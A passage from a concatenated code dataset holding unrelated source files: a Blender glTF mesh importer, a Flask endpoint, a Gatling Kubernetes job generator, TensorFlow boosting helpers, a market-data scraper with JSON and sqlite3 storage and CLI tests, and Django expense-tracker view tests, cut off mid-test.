# TRIANGLE FAN
# 3---2
# / \ / \
# 4---0---1
fs = [
(indices[0][0], indices[i][0], indices[i + 1][0])
for i in range(1, len(indices) - 1)
]
else:
raise Exception('primitive mode unimplemented: %d' % mode)
return es, fs
def set_normals(gltf, pyprimitive, mesh, offset, custom_normals):
"""Set Normal."""
if 'NORMAL' in pyprimitive.attributes.keys():
original_normal_data = BinaryData.get_data_from_accessor(gltf, pyprimitive.attributes['NORMAL'])
tmp_indices = {}
tmp_idx = 0
normal_data = []
for i in pyprimitive.tmp_indices:
if i[0] not in tmp_indices.keys():
tmp_indices[i[0]] = tmp_idx
tmp_idx += 1
normal_data.append(original_normal_data[i[0]])
for poly in mesh.polygons:
if gltf.import_settings['import_shading'] == "NORMALS":
calc_norm_vertices = []
for loop_idx in range(poly.loop_start, poly.loop_start + poly.loop_total):
vert_idx = mesh.loops[loop_idx].vertex_index
if vert_idx in range(offset, offset + pyprimitive.vertices_length):
cpt_vert = vert_idx - offset
mesh.vertices[vert_idx].normal = normal_data[cpt_vert]
custom_normals[vert_idx] = list(normal_data[cpt_vert])
calc_norm_vertices.append(vert_idx)
if len(calc_norm_vertices) == 3:
# Calcul normal
vert0 = mesh.vertices[calc_norm_vertices[0]].co
vert1 = mesh.vertices[calc_norm_vertices[1]].co
vert2 = mesh.vertices[calc_norm_vertices[2]].co
calc_normal = (vert1 - vert0).cross(vert2 - vert0).normalized()
# Compare normal to vertex normal
for i in calc_norm_vertices:
cpt_vert = vert_idx - offset
vec = Vector(
(normal_data[cpt_vert][0], normal_data[cpt_vert][1], normal_data[cpt_vert][2])
)
if not calc_normal.dot(vec) > 0.9999999:
poly.use_smooth = True
break
elif gltf.import_settings['import_shading'] == "FLAT":
poly.use_smooth = False
elif gltf.import_settings['import_shading'] == "SMOOTH":
poly.use_smooth = True
else:
pass # Should not happen
offset = offset + pyprimitive.vertices_length
return offset
def set_UV(gltf, pyprimitive, obj, mesh, offset):
"""Set UV Map."""
for texcoord in [attr for attr in pyprimitive.attributes.keys() if attr[:9] == "TEXCOORD_"]:
if bpy.app.version < (2, 80, 0):
if texcoord not in mesh.uv_textures:
mesh.uv_textures.new(texcoord)
pyprimitive.blender_texcoord[int(texcoord[9:])] = texcoord
else:
if texcoord not in mesh.uv_layers:
mesh.uv_layers.new(name=texcoord)
pyprimitive.blender_texcoord[int(texcoord[9:])] = texcoord
original_texcoord_data = BinaryData.get_data_from_accessor(gltf, pyprimitive.attributes[texcoord])
tmp_indices = {}
tmp_idx = 0
texcoord_data = []
for i in pyprimitive.tmp_indices:
if i[0] not in tmp_indices.keys():
tmp_indices[i[0]] = tmp_idx
tmp_idx += 1
texcoord_data.append(original_texcoord_data[i[0]])
for poly in mesh.polygons:
for loop_idx in range(poly.loop_start, poly.loop_start + poly.loop_total):
vert_idx = mesh.loops[loop_idx].vertex_index
if vert_idx in range(offset, offset + pyprimitive.vertices_length):
obj.data.uv_layers[texcoord].data[loop_idx].uv = \
Vector((texcoord_data[vert_idx - offset][0], 1 - texcoord_data[vert_idx - offset][1]))
offset = offset + pyprimitive.vertices_length
return offset
def set_UV_in_mat(gltf, pyprimitive, obj, vertex_color):
"""After nodetree creation, set UVMap in nodes."""
if pyprimitive.material is None:
return
if gltf.data.materials[pyprimitive.material].extensions \
and "KHR_materials_pbrSpecularGlossiness" in \
gltf.data.materials[pyprimitive.material].extensions.keys():
if pyprimitive.material is not None \
and gltf.data.materials[pyprimitive.material].extensions[
'KHR_materials_pbrSpecularGlossiness'
]['diffuse_type'] in [gltf.TEXTURE, gltf.TEXTURE_FACTOR]:
BlenderMaterial.set_uvmap(gltf, pyprimitive.material, pyprimitive, obj, vertex_color)
else:
if pyprimitive.material is not None \
and gltf.data.materials[pyprimitive.material].extensions[
'KHR_materials_pbrSpecularGlossiness'
]['specgloss_type'] in [gltf.TEXTURE, gltf.TEXTURE_FACTOR]:
BlenderMaterial.set_uvmap(gltf, pyprimitive.material, pyprimitive, obj, vertex_color)
else:
if pyprimitive.material is not None \
and gltf.data.materials[pyprimitive.material].pbr_metallic_roughness.color_type in \
[gltf.TEXTURE, gltf.TEXTURE_FACTOR]:
BlenderMaterial.set_uvmap(gltf, pyprimitive.material, pyprimitive, obj, vertex_color)
else:
if pyprimitive.material is not None \
and gltf.data.materials[pyprimitive.material].pbr_metallic_roughness.metallic_type in \
[gltf.TEXTURE, gltf.TEXTURE_FACTOR]:
BlenderMaterial.set_uvmap(gltf, pyprimitive.material, pyprimitive, obj, vertex_color)
def assign_material(gltf, pyprimitive, obj, bm, offset, cpt_index_mat):
"""Assign material to faces of primitives."""
if pyprimitive.material is not None:
vertex_color = None
if 'COLOR_0' in pyprimitive.attributes.keys():
vertex_color = 'COLOR_0'
obj.data.materials.append(bpy.data.materials[gltf.data.materials[pyprimitive.material].blender_material[vertex_color]])
for vert in bm.verts:
if vert.index in range(offset, offset + pyprimitive.vertices_length):
for loop in vert.link_loops:
face = loop.face.index
bm.faces[face].material_index = cpt_index_mat
cpt_index_mat += 1
offset = offset + pyprimitive.vertices_length
return offset, cpt_index_mat
```
|
{
"source": "jecklgamis/flask-example-app",
"score": 3
}
|
#### File: flask-example-app/app/api.py
```python
from flask import Blueprint
bp = Blueprint('api', __name__, url_prefix='/api')
from flask import jsonify
@bp.route('/', methods=['GET'])
def index():
return jsonify({"message": "This is the /api endpoint"})
```
|
{
"source": "jecklgamis/gatling-test-example",
"score": 3
}
|
#### File: k8s/job/create-job-yaml.py
```python
import argparse
import uuid
from jinja2 import Template
def write_job_file(template, output, name, java_opts, simulation_name):
template = Template(open(template, 'rt').read())
content = template.render(name=name, java_opts=java_opts, simulation_name=simulation_name)
open(output, 'wt').write(content)
print(f"Wrote {output}")
def parse_args():
parser = argparse.ArgumentParser(description='Create Kubernetes Job YAML file')
id = f"{str(uuid.uuid4())[:8]}"
parser.add_argument('--out',
default=f"job.yaml",
help='Job filename')
parser.add_argument('--name',
default=f"gatling-test-example-{id}",
help='Job name')
parser.add_argument('--java_opts',
default='-DbaseUrl=http://localhost:8080 -DrequestPerSecond=10 -DdurationMin=0.25',
help='Java opts')
parser.add_argument('--simulation',
default="gatling.test.example.simulation.ExampleGetSimulation",
help='Simulation name')
return parser.parse_args()
args = parse_args()
write_job_file('job-template.yaml', args.out, args.name, args.java_opts, args.simulation)
```
|
{
"source": "jecktion/text_classification_gather",
"score": 3
}
|
#### File: text_classification_gather/a00_boosting/a08_boosting.py
```python
import sys
reload(sys)
sys.setdefaultencoding('utf8')
import numpy as np
import tensorflow as tf
#main process for boosting:
#1.compute label weight after each epoch using validation data.
#2.get weights for each batch during traininig process
#3.compute loss using cross entropy with weights
#1.compute label weight after each epoch using validation data.
def compute_labels_weights(weights_label,logits,labels):
"""
compute weights for labels in current batch, and update weights_label(a dict)
:param weights_label:a dict
:param logit: [None,Vocabulary_size]
:param label: [None,]
:return:
"""
labels_predict=np.argmax(logits,axis=1) # logits:(256,108,754)
for i in range(len(labels)):
label=labels[i]
label_predict=labels_predict[i]
weight=weights_label.get(label,None)
if weight==None:
if label_predict == label:
weights_label[label]=(1,1)
else:
weights_label[label]=(1,0)
else:
number=weight[0]
correct=weight[1]
number=number+1
if label_predict==label:
correct=correct+1
weights_label[label]=(number,correct)
return weights_label
#2.get weights for each batch during traininig process
def get_weights_for_current_batch(answer_list,weights_dict):
"""
get weights for current batch
:param answer_list: a numpy array contain labels for a batch
:param weights_dict: a dict that contain weights for all labels
:return: a list. length is label size.
"""
weights_list_batch=list(np.ones((len(answer_list))))
answer_list=list(answer_list)
for i,label in enumerate(answer_list):
acc=weights_dict[label]
weights_list_batch[i]=min(1.5,1.0/(acc+0.001))
#if np.random.choice(200)==0: #print something from time to time
# print("weights_list_batch:",weights_list_batch)
return weights_list_batch
#3.compute loss using cross entropy with weights
def loss(logits,labels,weights):
loss= tf.losses.sparse_softmax_cross_entropy(labels, logits,weights=weights)
return loss
#######################################################################
#util function
def get_weights_label_as_standard_dict(weights_label):
weights_dict = {}
for k,v in weights_label.items():
count,correct=v
weights_dict[k]=float(correct)/float(count)
return weights_dict
```
|
{
"source": "jeckt/market_data",
"score": 3
}
|
#### File: market_data/market_data/data_adapter.py
```python
from abc import ABCMeta, abstractmethod, abstractproperty
from enum import Enum
# NOTE(steve): a factory method to return a type of data adapter based on
# source
def get_adapter(source):
if source == DataAdapterSource.JSON:
import market_data.json_data_adapter
return market_data.json_data_adapter.JsonDataAdapter
elif source == DataAdapterSource.SQLITE3:
import market_data.sqlite3_data_adapter
return market_data.sqlite3_data_adapter.Sqlite3DataAdapter
else:
raise InvalidDataAdapterSourceError(source)
class DataAdapterSource(Enum):
JSON = 1
SQLITE3 = 2
class DataAdapter(metaclass=ABCMeta):
@abstractproperty
def test_database(self):
raise NotImplementedError
@classmethod
@abstractmethod
def create_test_database(cls):
pass
@classmethod
@abstractmethod
def delete_test_database(cls):
pass
@classmethod
@abstractmethod
def create_database(cls, database):
pass
@classmethod
@abstractmethod
def connect(cls, conn_string):
pass
@abstractmethod
def close(self):
pass
@abstractmethod
def get_securities_list(self):
pass
@abstractmethod
def insert_securities(self, securities_to_add):
pass
@abstractmethod
def update_market_data(self, security, equity_data):
pass
@abstractmethod
def bulk_update_market_data(self, security, equity_data):
pass
@abstractmethod
def get_equity_data(self, security, dt):
pass
@abstractmethod
def get_equity_data_series(self, security):
"""Returns equity data series sorted by date (newest to oldest)"""
pass
class InvalidDataAdapterSourceError(Exception):
pass
class DatabaseExistsError(Exception):
pass
class DatabaseNotFoundError(Exception):
pass
```
#### File: market_data/market_data/scraper.py
```python
import datetime
import urllib.request
from bs4 import BeautifulSoup
from market_data.data import EquityData, EmptyDateListError
from market_data.data import InvalidTickerError, InvalidDateError
class Scraper:
def __init__(self, source):
if not source == 'yahoo':
raise InvalidSourceError(source)
self.source = source
# NOTE(steve): this allows the scrape equity data to accept
# both datetime and date objects. It only needs to the date.
@staticmethod
def _normalise_datetime(date):
try:
return date.date()
except AttributeError:
return date
@staticmethod
def _get_web_page(ticker):
url = r'https://finance.yahoo.com/quote/{ticker}/history?p={ticker}'
req = urllib.request.Request(url.replace('{ticker}', ticker))
with urllib.request.urlopen(req) as response:
page = response.read().decode('utf-8')
return page
@staticmethod
def _get_hist_price_data_table(page, ticker):
# NOTE(steve): parse the html page and find the table
# of historical price data based on table attributes
# to make it slightly more robust to changes in the webpage
# NOTE(steve): we use a try/except here to capture any errors in
# finding the historical prices table as it hides more of the
# implementation.
try:
parsed_html = BeautifulSoup(page, features='html.parser')
data_table = parsed_html.body.find('table',
attrs={'data-test':'historical-prices'})
data_table = data_table.find('tbody')
return data_table
except:
raise InvalidTickerError(ticker)
def scrape_equity_data(self, ticker, date):
date_only = Scraper._normalise_datetime(date)
page = Scraper._get_web_page(ticker)
data_table = Scraper._get_hist_price_data_table(page, ticker)
for row in data_table.children:
values = [col.next_element.text for col in
row.children if col.find('span')]
dt = datetime.datetime.strptime(values[0], '%b %d, %Y')
values[0] = dt.date()
if values[0] == date_only:
d = EquityData(*(v.replace(',', '') for v in values[1:]))
return d
raise InvalidDateError(f'{ticker}: {date}')
def scrape_eq_multiple_dates(self, ticker, date_list):
if date_list is None or len(date_list) == 0:
raise EmptyDateListError(ticker)
clean_date_list = [Scraper._normalise_datetime(dt) for dt in date_list]
page = Scraper._get_web_page(ticker)
data_table = Scraper._get_hist_price_data_table(page, ticker)
data = {}
for row in data_table.children:
values = [col.next_element.text for col in
row.children if col.find('span')]
dt = datetime.datetime.strptime(values[0], '%b %d, %Y')
values[0] = dt.date()
if values[0] in clean_date_list:
d = EquityData(*(v.replace(',', '') for v in values[1:]))
data[values[0]] = (values[0], d)
if len(data) == len(date_list):
break
# NOTE(steve): we need to order the data based on the
# order provided in the input date list
ordered_data = []
errors = []
for date in clean_date_list:
if date in data:
ordered_data.append(data[date])
else:
errors.append(InvalidDateError(date))
return ordered_data, errors
class InvalidSourceError(Exception):
pass
```
#### File: market_data/market_data/sqlite3_data_adapter.py
```python
import os
import datetime
from decimal import Decimal
import sqlite3
import freezegun
import market_data.data_adapter as data_adapter
from market_data.data import EquityData, InvalidTickerError, InvalidDateError
def adapt_date(dt):
return dt.strftime('%Y-%m-%d')
sqlite3.register_adapter(Decimal, lambda d: str(d))
sqlite3.register_converter("decimal", lambda d: Decimal(d.decode('utf-8')))
# NOTE(steve): freezegun has some pecularities where in certain situations
# it does not use the datetime.datetime adapter to convert datetime objects
# to string for the sqlite3 database so we explicit convert it
sqlite3.register_adapter(freezegun.api.FakeDatetime, adapt_date)
sqlite3.register_adapter(datetime.datetime, adapt_date)
sqlite3.register_converter("date",
lambda dt: datetime.datetime.strptime(dt.decode('utf-8'), '%Y-%m-%d'))
class Sqlite3DataAdapter(data_adapter.DataAdapter):
test_database = 'test.db'
@classmethod
def create_test_database(cls):
cls.create_database(cls.test_database)
@classmethod
def delete_test_database(cls):
if os.path.isfile(cls.test_database):
os.remove(cls.test_database)
else:
raise data_adapter.DatabaseNotFoundError
@classmethod
def create_database(cls, database):
if os.path.isfile(database):
raise data_adapter.DatabaseExistsError(database)
try:
conn = sqlite3.connect(database,
detect_types=sqlite3.PARSE_DECLTYPES)
with conn:
security_list_sql = """CREATE TABLE securities(
id integer PRIMARY KEY AUTOINCREMENT,
ticker text NOT NULL,
UNIQUE(ticker)
);"""
cursor = conn.cursor()
cursor.execute(security_list_sql)
equity_data_sql = """CREATE TABLE equity_prices(
id integer PRIMARY KEY AUTOINCREMENT,
ticker_id integer NOT NULL,
date date NOT NULL,
open decimal NOT NULL,
high decimal NOT NULL,
low decimal NOT NULL,
close decimal NOT NULL,
adj_close decimal NOT NULL,
volume integer NOT NULL,
UNIQUE(ticker_id, date)
FOREIGN KEY(ticker_id)
REFERENCES securities(id)
);"""
cursor.execute(equity_data_sql)
except sqlite3.Error as e:
print(e)
finally:
if conn is not None:
conn.close()
@classmethod
def connect(cls, conn_string):
if not os.path.isfile(conn_string):
raise data_adapter.DatabaseNotFoundError
return cls(conn_string)
def __init__(self, conn_string):
self.conn_string = conn_string
self._conn = sqlite3.connect(self.conn_string,
detect_types=sqlite3.PARSE_DECLTYPES)
self._conn.execute('PRAGMA foreign_keys = ON')
# TODO(steve): should this be a decorator???
def _check_is_valid_security(self, security):
tickers = self.get_securities_list()
if security not in tickers:
raise InvalidTickerError(security)
def _get_security_id(self, security):
with self._conn:
sql = "SELECT id FROM securities WHERE ticker = ?"
cursor = self._conn.cursor()
cursor.execute(sql, (security,))
ticker_id = cursor.fetchone()[0]
return ticker_id
def close(self):
if self._conn is not None:
self._conn.close()
def get_securities_list(self):
with self._conn:
cursor = self._conn.cursor()
cursor.execute('SELECT ticker FROM securities')
rows = cursor.fetchall()
return [row[0] for row in rows]
def insert_securities(self, securities_to_add):
sql = 'INSERT INTO securities(ticker) VALUES(?)'
with self._conn:
cursor = self._conn.cursor()
for security in securities_to_add:
try:
cursor.execute(sql, (security,))
except sqlite3.IntegrityError:
pass
def update_market_data(self, security, equity_data):
self._check_is_valid_security(security)
ticker_id = self._get_security_id(security)
date, data = equity_data[0], equity_data[1]
with self._conn:
sql = """REPLACE INTO equity_prices(ticker_id, date, open,
high, low, close, adj_close, volume)
VALUES (?, ?, ?, ?, ?, ?, ?, ?)"""
cursor = self._conn.cursor()
cursor.execute(sql, (ticker_id, date, data.open, data.high,
data.low, data.close, data.adj_close,
data.volume))
def bulk_update_market_data(self, security, equity_data):
self._check_is_valid_security(security)
ticker_id = self._get_security_id(security)
# TODO(steve): find a more efficient way to update the database
# instead of updating rows one by one
with self._conn:
for d in equity_data:
date, data = d[0], d[1]
sql = """REPLACE INTO equity_prices(ticker_id, date, open,
high, low, close, adj_close, volume)
VALUES (?, ?, ?, ?, ?, ?, ?, ?)"""
cursor = self._conn.cursor()
cursor.execute(sql, (ticker_id, date, data.open, data.high,
data.low, data.close, data.adj_close,
data.volume))
def _get_equity_data(self, ticker_id, date):
with self._conn:
sql = """SELECT open, high, low, close, adj_close, volume
FROM equity_prices WHERE (ticker_id = ? and
date = ?)"""
cursor = self._conn.cursor()
cursor.execute(sql, (ticker_id, date))
rows = cursor.fetchall()
return rows
def get_equity_data(self, security, date):
self._check_is_valid_security(security)
ticker_id = self._get_security_id(security)
rows = self._get_equity_data(ticker_id, date)
if len(rows) == 0:
raise InvalidDateError(date)
elif len(rows) == 1:
data = EquityData(*rows[0])
return data
def get_equity_data_series(self, security):
self._check_is_valid_security(security)
ticker_id = self._get_security_id(security)
with self._conn:
sql = """SELECT date, open, high, low, close, adj_close, volume
FROM equity_prices WHERE (ticker_id = ?)"""
cursor = self._conn.cursor()
cursor.execute(sql, (ticker_id,))
rows = cursor.fetchall()
data = [(row[0], EquityData(*row[1:])) for row in rows]
return sorted(data, reverse=True)
```
#### File: market_data/tests/cli_functional_tests.py
```python
import os
import sys
import inspect
file_path = os.path.dirname(inspect.getfile(inspect.currentframe()))
sys.path.insert(0, os.path.split(os.path.split(file_path)[0])[0])
import sys
import unittest
from unittest.mock import patch
import datetime
from parameterized import parameterized_class
from freezegun import freeze_time
import cli as app
from cli import Messages as msg
import market_data.data_adapter as data_adapter
import market_data.tests.utils as test_utils
@parameterized_class(('data_adapter_source', ),[
[data_adapter.DataAdapterSource.JSON, ],
[data_adapter.DataAdapterSource.SQLITE3, ]
])
class CommandLineInterfaceTests(unittest.TestCase):
def setUp(self):
self.da = data_adapter.get_adapter(self.data_adapter_source)
self.database = self.da.test_database
app.DATA_ADAPTER_SOURCE = self.data_adapter_source
self.actual_output = []
self.user_input = []
def mock_input(s):
self.actual_output.append(s)
return self.user_input.pop(0)
app.input = mock_input
app.print = lambda s: self.actual_output.append(s)
def tearDown(self):
try:
self.da.delete_test_database()
except:
pass
@freeze_time('2019-08-27')
@patch('market_data.scraper.Scraper.scrape_eq_multiple_dates',
autospec=True)
def test_update_security_for_multiple_dates(self, mock_scraper):
# Load test data
dataset = test_utils.load_test_data()
ticker = 'AMZN'
dt1 = datetime.datetime(2019, 8, 23)
expected_data_dt1 = test_utils.get_test_data(dataset, ticker, dt1)
dt2 = datetime.datetime(2019, 8, 26)
expected_data_dt2 = test_utils.get_test_data(dataset, ticker, dt2)
dt3 = datetime.datetime(2019, 8, 27)
expected_data_dt3 = test_utils.get_test_data(dataset, ticker, dt3)
data_series = [
(dt3, expected_data_dt3),
(dt2, expected_data_dt2),
(dt1, expected_data_dt1)
]
# Create an existing database with data already in the database
self.da.create_test_database()
data = self.da.connect(self.database)
data.insert_securities([ticker])
data.update_market_data(ticker, (dt1, expected_data_dt1))
data.close()
# Adam opens the app on an existing database.
sys.argv = ['./app.py', self.database]
expected_output = []
# He gets the standard main menu options to start
expected_output.append(msg.load_existing_database(self.database))
expected_output.append(msg.main_menu())
expected_output.append(msg.option_input())
# He updates the market data to get the latest data available
# The app will update all market data from the last available
# date to the current date
ret_value = [
(dt2.date(), expected_data_dt2),
(dt3.date(), expected_data_dt3)
]
mock_scraper.return_value = ret_value, []
self.user_input.append(app.MenuOptions.UPDATE_MARKET_DATA)
expected_output.append(msg.market_data_updated())
expected_output.append(msg.main_menu())
expected_output.append(msg.option_input())
# He then proceeds to view the updated market data
self.user_input.append(app.MenuOptions.VIEW_SECURITIES)
expected_output.append(msg.view_securities(['AMZN']))
expected_output.append(msg.option_input())
# He then chooses to see the updated market data in AMZN
self.user_input.append('1')
expected_output.append(msg.view_security_data(ticker, data_series))
expected_output.append(msg.any_key_to_return())
# Happy with the results he returns the view securities page
self.user_input.append('')
expected_output.append(msg.view_securities(['AMZN']))
expected_output.append(msg.option_input())
# This time she selects to go back to the main menu
# and quits the application
self.user_input.append('0')
expected_output.append(msg.main_menu())
expected_output.append(msg.option_input())
self.user_input.append(app.MenuOptions.QUIT)
expected_output.append(msg.quit())
# Method
app.main()
# Tests
for actual, expected in zip(self.actual_output, expected_output):
self.assertEqual(actual, expected)
self.assertEqual(len(self.actual_output), len(expected_output))
@freeze_time('2019-05-10')
@patch('market_data.scraper.Scraper.scrape_eq_multiple_dates',
autospec=True)
def test_update_and_view_updated_security(self, mock_scraper):
ticker, dt, expected_data = test_utils.get_expected_equity_data()
mock_scraper.return_value = [(dt.date(), expected_data)], []
# Mary on hearing from Alex about this new command line
# app decides to try it.
sys.argv = ['./app.py', self.database]
expected_output = []
# Upon opening the app she is presented with a bunch of options
expected_output.append(msg.new_database_created(self.database))
expected_output.append(msg.main_menu())
expected_output.append(msg.option_input())
# She selects to add a security and adds 'AMZN'
# The app then returns her to the main menu.
self.user_input.append(app.MenuOptions.ADD_SECURITIES)
expected_output.append(msg.add_security_input())
self.user_input.append('AMZN')
expected_output.append(msg.security_added('AMZN'))
expected_output.append(msg.main_menu())
expected_output.append(msg.option_input())
# Since the US equities market is closed she decides
# to update the market data whcih will update the
# security she just added
self.user_input.append(app.MenuOptions.UPDATE_MARKET_DATA)
expected_output.append(msg.market_data_updated())
expected_output.append(msg.main_menu())
expected_output.append(msg.option_input())
# She then proceeds to view the updated market data
self.user_input.append(app.MenuOptions.VIEW_SECURITIES)
expected_output.append(msg.view_securities(['AMZN']))
expected_output.append(msg.option_input())
# She then chooses to see the updated market data in AMZN
self.user_input.append('1')
expected_output.append(msg.view_security_data(ticker,
[(dt, expected_data)]))
expected_output.append(msg.any_key_to_return())
# Happy with the results she returns the view securities page
self.user_input.append('')
expected_output.append(msg.view_securities(['AMZN']))
expected_output.append(msg.option_input())
# This time she selects to go back to the main menu
# and quits the application
self.user_input.append('0')
expected_output.append(msg.main_menu())
expected_output.append(msg.option_input())
self.user_input.append(app.MenuOptions.QUIT)
expected_output.append(msg.quit())
# Method
app.main()
# Tests
for actual, expected in zip(self.actual_output, expected_output):
self.assertEqual(actual, expected)
self.assertEqual(len(self.actual_output), len(expected_output))
def test_add_securities_and_view_securities(self):
expected_output = []
# Alex has heard about this new command line app that can
# store financial market data for him. He decides to open it
# NOTE(steve): simulates ./app.py call on command line
expected_output.append(msg.no_database_specified())
sys.argv = ['./app.py']
app.main()
# Upon opening it, he is told that he has not specified
# a database for the application to hook up to.
self.assertEqual(expected_output, self.actual_output)
# Reading through the help provided, Alex decides to give it another
# go and this time provides a database connection for the app to
# create a new database file
sys.argv = ['./app.py', self.database]
expected_output = []
self.actual_output = []
# Upon providing the database connection string he is able
# to move on to the next screen in the app.
expected_output.append(msg.new_database_created(self.database))
expected_output.append(msg.main_menu())
expected_output.append(msg.option_input())
# Curious to see if there are any securities in the app already
# he selects option 1 to view the securities.
self.user_input.append(app.MenuOptions.VIEW_SECURITIES)
expected_output.append(msg.view_securities([]))
expected_output.append(msg.option_input())
# As expected there are no securities so he returns to the main menu
# and proceeds to option 2 to add securities
self.user_input.append('0')
expected_output.append(msg.main_menu())
expected_output.append(msg.option_input())
self.user_input.append(app.MenuOptions.ADD_SECURITIES)
expected_output.append(msg.add_security_input())
# He adds AMZN to the database
self.user_input.append('AMZN')
expected_output.append(msg.security_added('AMZN'))
expected_output.append(msg.main_menu())
expected_output.append(msg.option_input())
# He now checks that the security has been added to the list
self.user_input.append(app.MenuOptions.VIEW_SECURITIES)
expected_output.append(msg.view_securities(['AMZN']))
expected_output.append(msg.option_input())
# Satisfied with the results he returns to the main menu
# and closes the application
self.user_input.append('0')
expected_output.append(msg.main_menu())
expected_output.append(msg.option_input())
self.user_input.append(app.MenuOptions.QUIT)
expected_output.append(msg.quit())
# Method
app.main()
# Tests
for actual, expected in zip(self.actual_output, expected_output):
self.assertEqual(actual, expected)
self.assertEqual(len(self.actual_output), len(expected_output))
if __name__ == '__main__':
unittest.main()
```
|
{
"source": "jeckt/mindful-spending",
"score": 3
}
|
#### File: core/tests/test_views.py
```python
from django.test import TestCase
from django.utils.html import escape
from core.models import Expense
from core.forms import (
ExpenseForm, EMPTY_DESCRIPTION_ERROR,
EMPTY_AMOUNT_ERROR, NEGATIVE_AMOUNT_ERROR
)
from datetime import date, timedelta
today = date.today()
today_display = today.strftime('%d-%b-%Y')
today_input = today.strftime('%Y-%m-%d')
def create_two_expense_objects():
Expense.objects.create(description='expense 1',
amount=5.25,
date=today
)
Expense.objects.create(description='expense 2',
amount=2.5,
date=today
)
# TODO(steve): should we name the app core or expenses?!?
class HomePageTest(TestCase):
def test_uses_home_template(self):
response = self.client.get('/')
self.assertTemplateUsed(response, 'home.html')
def test_home_page_uses_expense_form(self):
response = self.client.get('/')
self.assertIsInstance(response.context['form'], ExpenseForm)
def test_can_save_POST_request(self):
response = self.client.post('/expenses/new', data={
'description': 'new expense',
'amount': 6.5,
'date': today_input
})
self.assertRedirects(response, '/')
self.assertEqual(Expense.objects.count(), 1)
new_expense = Expense.objects.first()
self.assertEqual(new_expense.description, 'new expense')
self.assertEqual(new_expense.amount, 6.5)
def test_POST_redirects_to_home_page(self):
response = self.client.post('/expenses/new', data={
'description': 'new expense',
'amount': 6.5,
'date': today_input
})
self.assertRedirects(response, '/')
def test_expenses_displayed_on_home_page(self):
create_two_expense_objects()
response = self.client.get('/')
self.assertContains(response, 'expense 1')
self.assertContains(response, 'expense 2')
self.assertContains(response, '5.25')
self.assertContains(response, '2.5')
self.assertEqual(response.content.decode().count(today_display), 2)
def test_total_expenses_displayed_on_home_page(self):
create_two_expense_objects()
response = self.client.get('/')
self.assertContains(response, '7.75')
class ExpenseValidationViewTest(TestCase):
def post_expense_with_empty_description(self):
return self.client.post('/expenses/new', data={
'description': '',
'amount': 5.25,
'date': today_input
})
def test_invalid_input_doesnt_clear_previous_expenses(self):
create_two_expense_objects()
response = self.post_expense_with_empty_description()
self.assertContains(response, 'expense 1')
self.assertContains(response, 'expense 2')
self.assertContains(response, '5.25')
self.assertContains(response, '2.5')
self.assertEqual(response.content.decode().count(today_display), 2)
self.assertContains(response, '7.75') # total expenses
def test_for_invalid_input_passes_form_to_template(self):
response = self.post_expense_with_empty_description()
self.assertIsInstance(response.context['form'], ExpenseForm)
# TODO(steve): should we move this into separate test cases?!
def test_for_invalid_input_nothing_saved_to_db(self):
self.post_expense_with_empty_description()
self.assertEqual(Expense.objects.count(), 0)
self.client.post('/expenses/new', data={
'description': '',
'amount': ''
})
self.assertEqual(Expense.objects.count(), 0)
self.client.post('/expenses/new', data={
'description': 'No amount',
'amount': ''
})
self.assertEqual(Expense.objects.count(), 0)
self.client.post('/expenses/new', data={
'description': 'Negative amount',
'amount': -0.4
})
self.assertEqual(Expense.objects.count(), 0)
def test_empty_description_shows_errors(self):
response = self.post_expense_with_empty_description()
expected_error = escape(EMPTY_DESCRIPTION_ERROR)
self.assertContains(response, expected_error)
self.assertTemplateUsed(response, 'home.html')
def test_empty_amount_shows_errors(self):
response = self.client.post('/expenses/new', data={
'description': 'No amount',
'amount': ''
})
expected_error = escape(EMPTY_AMOUNT_ERROR)
self.assertContains(response, expected_error)
self.assertTemplateUsed(response, 'home.html')
def test_negative_amount_shows_errors(self):
response = self.client.post('/expenses/new', data={
'description': 'Negative amount',
'amount': -0.4
})
expected_error = escape(NEGATIVE_AMOUNT_ERROR)
self.assertContains(response, expected_error)
self.assertTemplateUsed(response, 'home.html')
class ExpenseDeletionTest(TestCase):
def test_can_delete_POST_request(self):
expense = Expense.objects.create()
self.assertEqual(Expense.objects.count(), 1)
self.client.post(f'/expenses/{expense.id}/delete')
self.assertEqual(Expense.objects.count(), 0)
def test_delete_removes_expenses_from_view(self):
expense = Expense.objects.create(description='expense 1',
amount=5.25,
date=today
)
response = self.client.get('/expenses/edit')
response = self.client.get('/expenses/edit')
self.assertContains(response, 'expense 1')
self.assertContains(response, '5.25')
self.assertContains(response, today_input)
self.client.post(f'/expenses/{expense.id}/delete')
response = self.client.get('/expenses/edit')
self.assertNotContains(response, 'expense 1')
self.assertNotContains(response, '5.25')
self.assertNotContains(response, today_input)
def test_delete_POST_redirects_to_edit_page(self):
expense = Expense.objects.create()
response = self.client.post(f'/expenses/{expense.id}/delete')
self.assertRedirects(response, '/expenses/edit')
class ExpenseEditViewTest(TestCase):
def test_uses_edit_template(self):
response = self.client.get('/expenses/edit')
self.assertTemplateUsed(response, 'edit.html')
def test_expenses_displayed_on_edit_page(self):
create_two_expense_objects()
response = self.client.get('/expenses/edit')
self.assertContains(response, 'expense 1')
self.assertContains(response, 'expense 2')
self.assertContains(response, '5.25')
self.assertContains(response, '2.5')
self.assertEqual(response.content.decode().count(today_input), 4)
def test_can_update_POST_request(self):
expense = Expense.objects.create(description='expense 1',
amount=5.25,
date=today
)
self.assertEqual(Expense.objects.count(), 1)
response = self.client.get('/expenses/edit')
self.assertContains(response, 'expense 1')
self.assertContains(response, '5.25')
self.assertContains(response, today_input)
new_date = (today + timedelta(days=1))
response = self.client.post(f'/expenses/edit/{expense.id}', data={
'description': 'expense 2',
'amount': '15.25',
'date': new_date.strftime('%Y-%m-%d')
})
response = self.client.get('/expenses/edit')
self.assertContains(response, 'expense 2')
self.assertContains(response, '15.25')
self.assertContains(response, new_date.strftime('%Y-%m-%d'))
def test_invalid_update_does_not_change_expense(self):
expense = Expense.objects.create(description='expense 1',
amount=5.25,
date=today
)
self.assertEqual(Expense.objects.count(), 1)
response = self.client.get('/expenses/edit')
self.assertContains(response, 'expense 1')
self.assertContains(response, '5.25')
self.assertContains(response, today_input)
response = self.client.post(f'/expenses/edit/{expense.id}', data={
'description': 'expense 1',
'amount': '5.25',
'date': today_input
})
response = self.client.get('/expenses/edit')
self.assertContains(response, 'expense 1')
self.assertContains(response, '5.25')
self.assertContains(response, today_input)
def test_valid_edit_POST_redirects_to_edit_page(self):
expense = Expense.objects.create()
response = self.client.post(f'/expenses/edit/{expense.id}', data={
'description': 'expense 1',
'amount': '5.25',
'date': today_input
})
self.assertRedirects(response, '/expenses/edit')
def test_invalid_edit_POST_redirects_to_edit_page(self):
